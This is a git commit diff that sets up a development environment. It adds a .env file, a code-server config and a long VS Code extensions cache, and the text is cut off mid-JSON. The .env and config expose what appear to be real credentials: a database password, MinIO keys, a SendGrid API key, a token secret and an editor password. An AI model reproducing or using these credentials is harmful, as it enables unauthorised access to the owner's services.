commit a34e5b7976d89ac8c955e777b24bc8cdef2e0391 Author: Kincses Date: Tue Feb 3 19:55:45 2026 +0000 Initial commit - Migrated to Dev environment diff --git a/.env b/.env new file mode 100755 index 0000000..467c423 --- /dev/null +++ b/.env @@ -0,0 +1,32 @@ +# --- ADATBÁZIS KAPCSOLAT (Központi) --- +# Itt a 'shared-postgres' nevet használjuk, ami a központi konténer neve +APP_DB_HOST=shared-postgres +APP_DB_PORT=5432 +APP_DB_NAME=service_finder +APP_DB_USER=service_finder_app +# IDE ÍRD AZT A JELSZÓT, amit a pgAdminban/ALTER USER parancsnál adtál a 'service_finder_app'-nak! +APP_DB_PASSWORD='MiskociA74' + +# Ez a legfontosabb sor, ezt használja a Python program: +DATABASE_URL=postgresql+asyncpg://service_finder_app:MiskociA74@shared-postgres:5432/service_finder +# Migrációhoz (néha szinkron driver kell): +MIGRATION_DATABASE_URL=postgresql+asyncpg://service_finder_app:MiskociA74@shared-postgres:5432/service_finder + +# --- ALKALMAZÁS BEÁLLÍTÁSOK --- +ALLOWED_ORIGINS="https://app.profibot.hu,https://dev.profibot.hu,http://localhost:3000" +PYTHONPATH=/app + +# --- MINIO (Fájltárolás) --- +# Ez maradhat helyi konténer, vagy köthetjük a központihoz is, de most hagyjuk a projektben +MINIO_ENDPOINT=minio:9000 +MINIO_ROOT_USER=kincses +MINIO_ROOT_PASSWORD='MiskociA74' +MINIO_ACCESS_KEY=kincses +MINIO_SECRET_KEY='MiskociA74' + +# --- EGYÉB API KULCSOK --- +SENDGRID_API_KEY=SG.SENDGRID_API_KEY=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 +FROM_EMAIL=info@profibot.hu + +# Biztonsági kulcs a tokenekhez (KÖTELEZŐ!) +SECRET_KEY=2dca2ff3bf9b8184e14038d5d08e646b31bd4a5f5ffc7e19d28e294f3bb3760b \ No newline at end of file diff --git a/.vscode_config/.bashrc b/.vscode_config/.bashrc new file mode 100755 index 0000000..8606bd4 --- /dev/null +++ b/.vscode_config/.bashrc @@ -0,0 +1 @@ +export DOCKER_API_VERSION=1.41 diff --git a/.vscode_config/.cache/Microsoft/DeveloperTools/deviceid b/.vscode_config/.cache/Microsoft/DeveloperTools/deviceid new file mode 100755 index 0000000..13ac7fc --- /dev/null +++ b/.vscode_config/.cache/Microsoft/DeveloperTools/deviceid @@ -0,0 +1 @@ +d1ac84bc-108c-489c-87af-0afe360c0c05 \ No newline at end of file diff --git a/.vscode_config/.cache/typescript/5.9/package.json b/.vscode_config/.cache/typescript/5.9/package.json new file mode 100755 index 0000000..cc0458e --- /dev/null +++ b/.vscode_config/.cache/typescript/5.9/package.json @@ -0,0 +1 @@ +{ "private": true } \ No newline at end of file diff --git a/.vscode_config/.config/code-server/config.yaml b/.vscode_config/.config/code-server/config.yaml new file mode 100755 index 0000000..1c80291 --- /dev/null +++ b/.vscode_config/.config/code-server/config.yaml @@ -0,0 +1,4 @@ +bind-addr: 127.0.0.1:8080 +auth: password +password: c57656fba2427a75970869df +cert: false diff --git a/.vscode_config/.local/share/code-server/CachedProfilesData/__default__profile__/extensions.builtin.cache b/.vscode_config/.local/share/code-server/CachedProfilesData/__default__profile__/extensions.builtin.cache new file mode 100755 index 0000000..3c82b37 --- /dev/null +++ b/.vscode_config/.local/share/code-server/CachedProfilesData/__default__profile__/extensions.builtin.cache @@ -0,0 +1 @@ +{"input":{"location":{"$mid":1,"fsPath":"/usr/lib/code-server/lib/vscode/extensions","path":"/usr/lib/code-server/lib/vscode/extensions","scheme":"file"},"mtime":1768623069000,"profile":false,"type":0,"validate":true,"productVersion":"1.108.1","productDate":"2026-01-17T02:07:59.304Z","productCommit":"ba588b47099b31ad9734ef05534e9813bae22c64","devMode":false,"language":"en","translations":{}},"result":[{"type":0,"identifier":{"id":"vscode.bat"},"manifest":{"name":"bat","displayName":"Windows Bat Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in Windows batch files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.52.0"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin mmims/language-batchfile grammars/batchfile.cson ./syntaxes/batchfile.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"bat","extensions":[".bat",".cmd"],"aliases":["Batch","bat"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"bat","scopeName":"source.batchfile","path":"./syntaxes/batchfile.tmLanguage.json"}],"snippets":[{"language":"bat","path":"./snippets/batchfile.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/bat","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.clojure"},"manifest":{"name":"clojure","displayName":"Clojure Language Basics","description":"Provides syntax highlighting and bracket matching in Clojure files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin atom/language-clojure grammars/clojure.cson ./syntaxes/clojure.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"clojure","aliases":["Clojure","clojure"],"extensions":[".clj",".cljs",".cljc",".cljx",".clojure",".edn"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"clojure","scopeName":"source.clojure","path":"./syntaxes/clojure.tmLanguage.json"}],"configurationDefaults":{"[clojure]":{"diffEditor.ignoreTrimWhitespace":false}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/clojure","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.coffeescript"},"manifest":{"name":"coffeescript","displayName":"CoffeeScript Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in CoffeeScript files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin atom/language-coffee-script grammars/coffeescript.cson ./syntaxes/coffeescript.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"coffeescript","extensions":[".coffee",".cson",".iced"],"aliases":["CoffeeScript","coffeescript","coffee"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"coffeescript","scopeName":"source.coffee","path":"./syntaxes/coffeescript.tmLanguage.json"}],"breakpoints":[{"language":"coffeescript"}],"snippets":[{"language":"coffeescript","path":"./snippets/coffeescript.code-snippets"}],"configurationDefaults":{"[coffeescript]":{"diffEditor.ignoreTrimWhitespace":false,"editor.defaultColorDecorators":"never"}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/coffeescript","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.configuration-editing"},"manifest":{"name":"configuration-editing","displayName":"Configuration Editing","description":"Provides capabilities (advanced IntelliSense, auto-fixing) in configuration files like settings, launch, and extension recommendation files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.0.0"},"icon":"images/icon.png","activationEvents":["onProfile","onProfile:github","onLanguage:json","onLanguage:jsonc"],"enabledApiProposals":["profileContentHandlers"],"main":"./dist/configurationEditingMain","browser":"./dist/browser/configurationEditingMain","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"contributes":{"languages":[{"id":"jsonc","extensions":[".code-workspace","language-configuration.json","icon-theme.json","color-theme.json"],"filenames":["settings.json","launch.json","tasks.json","mcp.json","keybindings.json","extensions.json","argv.json","profiles.json","devcontainer.json",".devcontainer.json"]},{"id":"json","extensions":[".code-profile"]}],"jsonValidation":[{"fileMatch":"vscode://defaultsettings/keybindings.json","url":"vscode://schemas/keybindings"},{"fileMatch":"%APP_SETTINGS_HOME%/keybindings.json","url":"vscode://schemas/keybindings"},{"fileMatch":"%APP_SETTINGS_HOME%/profiles/*/keybindings.json","url":"vscode://schemas/keybindings"},{"fileMatch":"vscode://defaultsettings/*.json","url":"vscode://schemas/settings/default"},{"fileMatch":"%APP_SETTINGS_HOME%/settings.json","url":"vscode://schemas/settings/user"},{"fileMatch":"%APP_SETTINGS_HOME%/profiles/*/settings.json","url":"vscode://schemas/settings/profile"},{"fileMatch":"%MACHINE_SETTINGS_HOME%/settings.json","url":"vscode://schemas/settings/machine"},{"fileMatch":"%APP_WORKSPACES_HOME%/*/workspace.json","url":"vscode://schemas/workspaceConfig"},{"fileMatch":"**/*.code-workspace","url":"vscode://schemas/workspaceConfig"},{"fileMatch":"**/argv.json","url":"vscode://schemas/argv"},{"fileMatch":"/.vscode/settings.json","url":"vscode://schemas/settings/folder"},{"fileMatch":"/.vscode/launch.json","url":"vscode://schemas/launch"},{"fileMatch":"/.vscode/tasks.json","url":"vscode://schemas/tasks"},{"fileMatch":"/.vscode/mcp.json","url":"vscode://schemas/mcp"},{"fileMatch":"%APP_SETTINGS_HOME%/tasks.json","url":"vscode://schemas/tasks"},{"fileMatch":"%APP_SETTINGS_HOME%/snippets/*.json","url":"vscode://schemas/snippets"},{"fileMatch":"%APP_SETTINGS_HOME%/prompts/*.toolsets.jsonc","url":"vscode://schemas/toolsets"},{"fileMatch":"%APP_SETTINGS_HOME%/profiles/*/snippets/.json","url":"vscode://schemas/snippets"},{"fileMatch":"%APP_SETTINGS_HOME%/sync/snippets/preview/*.json","url":"vscode://schemas/snippets"},{"fileMatch":"**/*.code-snippets","url":"vscode://schemas/global-snippets"},{"fileMatch":"/.vscode/extensions.json","url":"vscode://schemas/extensions"},{"fileMatch":"devcontainer.json","url":"https://raw.githubusercontent.com/devcontainers/spec/main/schemas/devContainer.schema.json"},{"fileMatch":".devcontainer.json","url":"https://raw.githubusercontent.com/devcontainers/spec/main/schemas/devContainer.schema.json"},{"fileMatch":"%APP_SETTINGS_HOME%/globalStorage/ms-vscode-remote.remote-containers/nameConfigs/*.json","url":"./schemas/attachContainer.schema.json"},{"fileMatch":"%APP_SETTINGS_HOME%/globalStorage/ms-vscode-remote.remote-containers/imageConfigs/*.json","url":"./schemas/attachContainer.schema.json"},{"fileMatch":"**/quality/*/product.json","url":"vscode://schemas/vscode-product"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/configuration-editing","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.cpp"},"manifest":{"name":"cpp","displayName":"C/C++ Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in C/C++ files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ./build/update-grammars.js"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"c","extensions":[".c",".i"],"aliases":["C","c"],"configuration":"./language-configuration.json"},{"id":"cpp","extensions":[".cpp",".cppm",".cc",".ccm",".cxx",".cxxm",".c++",".c++m",".hpp",".hh",".hxx",".h++",".h",".ii",".ino",".inl",".ipp",".ixx",".tpp",".txx",".hpp.in",".h.in"],"aliases":["C++","Cpp","cpp"],"configuration":"./language-configuration.json"},{"id":"cuda-cpp","extensions":[".cu",".cuh"],"aliases":["CUDA C++"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"c","scopeName":"source.c","path":"./syntaxes/c.tmLanguage.json"},{"language":"cpp","scopeName":"source.cpp.embedded.macro","path":"./syntaxes/cpp.embedded.macro.tmLanguage.json"},{"language":"cpp","scopeName":"source.cpp","path":"./syntaxes/cpp.tmLanguage.json"},{"scopeName":"source.c.platform","path":"./syntaxes/platform.tmLanguage.json"},{"language":"cuda-cpp","scopeName":"source.cuda-cpp","path":"./syntaxes/cuda-cpp.tmLanguage.json"}],"problemPatterns":[{"name":"nvcc-location","regexp":"^(.*)\\((\\d+)\\):\\s+(warning|error):\\s+(.*)","kind":"location","file":1,"location":2,"severity":3,"message":4}],"problemMatchers":[{"name":"nvcc","owner":"cuda-cpp","fileLocation":["relative","${workspaceFolder}"],"pattern":"$nvcc-location"}],"snippets":[{"language":"c","path":"./snippets/c.code-snippets"},{"language":"cpp","path":"./snippets/cpp.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/cpp","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.csharp"},"manifest":{"name":"csharp","displayName":"C# Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in C# files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin dotnet/csharp-tmLanguage grammars/csharp.tmLanguage ./syntaxes/csharp.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"configurationDefaults":{"[csharp]":{"editor.maxTokenizationLineLength":2500}},"languages":[{"id":"csharp","extensions":[".cs",".csx",".cake"],"aliases":["C#","csharp"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"csharp","scopeName":"source.cs","path":"./syntaxes/csharp.tmLanguage.json","tokenTypes":{"meta.interpolation":"other"},"unbalancedBracketScopes":["keyword.operator.relational.cs","keyword.operator.arrow.cs","punctuation.accessor.pointer.cs","keyword.operator.bitwise.shift.cs","keyword.operator.assignment.compound.bitwise.cs"]}],"snippets":[{"language":"csharp","path":"./snippets/csharp.code-snippets"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/csharp","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.css"},"manifest":{"name":"css","displayName":"CSS Language Basics","description":"Provides syntax highlighting and bracket matching for CSS, LESS and SCSS files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin microsoft/vscode-css grammars/css.cson ./syntaxes/css.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"css","aliases":["CSS","css"],"extensions":[".css"],"mimetypes":["text/css"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"css","scopeName":"source.css","path":"./syntaxes/css.tmLanguage.json","tokenTypes":{"meta.function.url string.quoted":"other"}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/css","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.css-language-features"},"manifest":{"name":"css-language-features","displayName":"CSS Language Features","description":"Provides rich language support for CSS, LESS and SCSS files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.77.0"},"icon":"icons/css.png","activationEvents":["onLanguage:css","onLanguage:less","onLanguage:scss","onCommand:_css.applyCodeAction"],"main":"./client/dist/node/cssClientMain","browser":"./client/dist/browser/cssClientMain","capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"categories":["Programming Languages"],"contributes":{"configuration":[{"order":22,"id":"css","title":"CSS","properties":{"css.customData":{"type":"array","markdownDescription":"A list of relative file paths pointing to JSON files following the [custom data format](https://github.com/microsoft/vscode-css-languageservice/blob/master/docs/customData.md).\n\nVS Code loads custom data on startup to enhance its CSS support for CSS custom properties (variables), at-rules, pseudo-classes, and pseudo-elements you specify in the JSON files.\n\nThe file paths are relative to workspace and only workspace folder settings are considered.","default":[],"items":{"type":"string"},"scope":"resource"},"css.completion.triggerPropertyValueCompletion":{"type":"boolean","scope":"resource","default":true,"description":"By default, VS Code triggers property value completion after selecting a CSS property. Use this setting to disable this behavior."},"css.completion.completePropertyWithSemicolon":{"type":"boolean","scope":"resource","default":true,"description":"Insert semicolon at end of line when completing CSS properties."},"css.validate":{"type":"boolean","scope":"resource","default":true,"description":"Enables or disables all validations."},"css.hover.documentation":{"type":"boolean","scope":"resource","default":true,"description":"Show property and value documentation in CSS hovers."},"css.hover.references":{"type":"boolean","scope":"resource","default":true,"description":"Show references to MDN in CSS hovers."},"css.lint.compatibleVendorPrefixes":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"When using a vendor-specific prefix make sure to also include all other vendor-specific properties."},"css.lint.vendorPrefix":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"When using a vendor-specific prefix, also include the standard property."},"css.lint.duplicateProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Do not use duplicate style definitions."},"css.lint.emptyRules":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Do not use empty rulesets."},"css.lint.importStatement":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Import statements do not load in parallel."},"css.lint.boxModel":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Do not use `width` or `height` when using `padding` or `border`."},"css.lint.universalSelector":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"The universal selector (`*`) is known to be slow."},"css.lint.zeroUnits":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"No unit for zero needed."},"css.lint.fontFaceProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","markdownDescription":"`@font-face` rule must define `src` and `font-family` properties."},"css.lint.hexColorLength":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"error","description":"Hex colors must consist of 3, 4, 6 or 8 hex numbers."},"css.lint.argumentsInColorFunction":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"error","description":"Invalid number of parameters."},"css.lint.unknownProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Unknown property."},"css.lint.validProperties":{"type":"array","uniqueItems":true,"items":{"type":"string"},"scope":"resource","default":[],"description":"A list of properties that are not validated against the `unknownProperties` rule."},"css.lint.ieHack":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"IE hacks are only necessary when supporting IE7 and older."},"css.lint.unknownVendorSpecificProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Unknown vendor specific property."},"css.lint.propertyIgnoredDueToDisplay":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","markdownDescription":"Property is ignored due to the display. E.g. with `display: inline`, the `width`, `height`, `margin-top`, `margin-bottom`, and `float` properties have no effect."},"css.lint.important":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Avoid using `!important`. It is an indication that the specificity of the entire CSS has gotten out of control and needs to be refactored."},"css.lint.float":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Avoid using `float`. Floats lead to fragile CSS that is easy to break if one aspect of the layout changes."},"css.lint.idSelector":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Selectors should not contain IDs because these rules are too tightly coupled with the HTML."},"css.lint.unknownAtRules":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Unknown at-rule."},"css.trace.server":{"type":"string","scope":"window","enum":["off","messages","verbose"],"default":"off","description":"Traces the communication between VS Code and the CSS language server."},"css.format.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable default CSS formatter."},"css.format.newlineBetweenSelectors":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Separate selectors with a new line."},"css.format.newlineBetweenRules":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Separate rulesets by a blank line."},"css.format.spaceAroundSelectorSeparator":{"type":"boolean","scope":"resource","default":false,"markdownDescription":"Ensure a space character around selector separators '>', '+', '~' (e.g. `a > b`)."},"css.format.braceStyle":{"type":"string","scope":"resource","default":"collapse","enum":["collapse","expand"],"markdownDescription":"Put braces on the same line as rules (`collapse`) or put braces on own line (`expand`)."},"css.format.preserveNewLines":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Whether existing line breaks before rules and declarations should be preserved."},"css.format.maxPreserveNewLines":{"type":["number","null"],"scope":"resource","default":null,"markdownDescription":"Maximum number of line breaks to be preserved in one chunk, when `#css.format.preserveNewLines#` is enabled."}}},{"id":"scss","order":24,"title":"SCSS (Sass)","properties":{"scss.completion.triggerPropertyValueCompletion":{"type":"boolean","scope":"resource","default":true,"description":"By default, VS Code triggers property value completion after selecting a CSS property. Use this setting to disable this behavior."},"scss.completion.completePropertyWithSemicolon":{"type":"boolean","scope":"resource","default":true,"description":"Insert semicolon at end of line when completing CSS properties."},"scss.validate":{"type":"boolean","scope":"resource","default":true,"description":"Enables or disables all validations."},"scss.hover.documentation":{"type":"boolean","scope":"resource","default":true,"description":"Show property and value documentation in SCSS hovers."},"scss.hover.references":{"type":"boolean","scope":"resource","default":true,"description":"Show references to MDN in SCSS hovers."},"scss.lint.compatibleVendorPrefixes":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"When using a vendor-specific prefix make sure to also include all other vendor-specific properties."},"scss.lint.vendorPrefix":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"When using a vendor-specific prefix, also include the standard property."},"scss.lint.duplicateProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Do not use duplicate style definitions."},"scss.lint.emptyRules":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Do not use empty rulesets."},"scss.lint.importStatement":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Import statements do not load in parallel."},"scss.lint.boxModel":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Do not use `width` or `height` when using `padding` or `border`."},"scss.lint.universalSelector":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"The universal selector (`*`) is known to be slow."},"scss.lint.zeroUnits":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"No unit for zero needed."},"scss.lint.fontFaceProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","markdownDescription":"`@font-face` rule must define `src` and `font-family` properties."},"scss.lint.hexColorLength":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"error","description":"Hex colors must consist of 3, 4, 6 or 8 hex numbers."},"scss.lint.argumentsInColorFunction":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"error","description":"Invalid number of parameters."},"scss.lint.unknownProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Unknown property."},"scss.lint.validProperties":{"type":"array","uniqueItems":true,"items":{"type":"string"},"scope":"resource","default":[],"description":"A list of properties that are not validated against the `unknownProperties` rule."},"scss.lint.ieHack":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"IE hacks are only necessary when supporting IE7 and older."},"scss.lint.unknownVendorSpecificProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Unknown vendor specific property."},"scss.lint.propertyIgnoredDueToDisplay":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","markdownDescription":"Property is ignored due to the display. E.g. with `display: inline`, the `width`, `height`, `margin-top`, `margin-bottom`, and `float` properties have no effect."},"scss.lint.important":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Avoid using `!important`. It is an indication that the specificity of the entire CSS has gotten out of control and needs to be refactored."},"scss.lint.float":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Avoid using `float`. Floats lead to fragile CSS that is easy to break if one aspect of the layout changes."},"scss.lint.idSelector":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Selectors should not contain IDs because these rules are too tightly coupled with the HTML."},"scss.lint.unknownAtRules":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Unknown at-rule."},"scss.format.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable default SCSS formatter."},"scss.format.newlineBetweenSelectors":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Separate selectors with a new line."},"scss.format.newlineBetweenRules":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Separate rulesets by a blank line."},"scss.format.spaceAroundSelectorSeparator":{"type":"boolean","scope":"resource","default":false,"markdownDescription":"Ensure a space character around selector separators '>', '+', '~' (e.g. `a > b`)."},"scss.format.braceStyle":{"type":"string","scope":"resource","default":"collapse","enum":["collapse","expand"],"markdownDescription":"Put braces on the same line as rules (`collapse`) or put braces on own line (`expand`)."},"scss.format.preserveNewLines":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Whether existing line breaks before rules and declarations should be preserved."},"scss.format.maxPreserveNewLines":{"type":["number","null"],"scope":"resource","default":null,"markdownDescription":"Maximum number of line breaks to be preserved in one chunk, when `#scss.format.preserveNewLines#` is enabled."}}},{"id":"less","order":23,"type":"object","title":"LESS","properties":{"less.completion.triggerPropertyValueCompletion":{"type":"boolean","scope":"resource","default":true,"description":"By default, VS Code triggers property value completion after selecting a CSS property. Use this setting to disable this behavior."},"less.completion.completePropertyWithSemicolon":{"type":"boolean","scope":"resource","default":true,"description":"Insert semicolon at end of line when completing CSS properties."},"less.validate":{"type":"boolean","scope":"resource","default":true,"description":"Enables or disables all validations."},"less.hover.documentation":{"type":"boolean","scope":"resource","default":true,"description":"Show property and value documentation in LESS hovers."},"less.hover.references":{"type":"boolean","scope":"resource","default":true,"description":"Show references to MDN in LESS hovers."},"less.lint.compatibleVendorPrefixes":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"When using a vendor-specific prefix make sure to also include all other vendor-specific properties."},"less.lint.vendorPrefix":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"When using a vendor-specific prefix, also include the standard property."},"less.lint.duplicateProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Do not use duplicate style definitions."},"less.lint.emptyRules":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Do not use empty rulesets."},"less.lint.importStatement":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Import statements do not load in parallel."},"less.lint.boxModel":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Do not use `width` or `height` when using `padding` or `border`."},"less.lint.universalSelector":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"The universal selector (`*`) is known to be slow."},"less.lint.zeroUnits":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"No unit for zero needed."},"less.lint.fontFaceProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","markdownDescription":"`@font-face` rule must define `src` and `font-family` properties."},"less.lint.hexColorLength":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"error","description":"Hex colors must consist of 3, 4, 6 or 8 hex numbers."},"less.lint.argumentsInColorFunction":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"error","description":"Invalid number of parameters."},"less.lint.unknownProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Unknown property."},"less.lint.validProperties":{"type":"array","uniqueItems":true,"items":{"type":"string"},"scope":"resource","default":[],"description":"A list of properties that are not validated against the `unknownProperties` rule."},"less.lint.ieHack":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"IE hacks are only necessary when supporting IE7 and older."},"less.lint.unknownVendorSpecificProperties":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Unknown vendor specific property."},"less.lint.propertyIgnoredDueToDisplay":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","markdownDescription":"Property is ignored due to the display. E.g. with `display: inline`, the `width`, `height`, `margin-top`, `margin-bottom`, and `float` properties have no effect."},"less.lint.important":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Avoid using `!important`. It is an indication that the specificity of the entire CSS has gotten out of control and needs to be refactored."},"less.lint.float":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","markdownDescription":"Avoid using `float`. Floats lead to fragile CSS that is easy to break if one aspect of the layout changes."},"less.lint.idSelector":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"ignore","description":"Selectors should not contain IDs because these rules are too tightly coupled with the HTML."},"less.lint.unknownAtRules":{"type":"string","scope":"resource","enum":["ignore","warning","error"],"default":"warning","description":"Unknown at-rule."},"less.format.enable":{"type":"boolean","scope":"window","default":true,"description":"Enable/disable default LESS formatter."},"less.format.newlineBetweenSelectors":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Separate selectors with a new line."},"less.format.newlineBetweenRules":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Separate rulesets by a blank line."},"less.format.spaceAroundSelectorSeparator":{"type":"boolean","scope":"resource","default":false,"markdownDescription":"Ensure a space character around selector separators '>', '+', '~' (e.g. `a > b`)."},"less.format.braceStyle":{"type":"string","scope":"resource","default":"collapse","enum":["collapse","expand"],"markdownDescription":"Put braces on the same line as rules (`collapse`) or put braces on own line (`expand`)."},"less.format.preserveNewLines":{"type":"boolean","scope":"resource","default":true,"markdownDescription":"Whether existing line breaks before rules and declarations should be 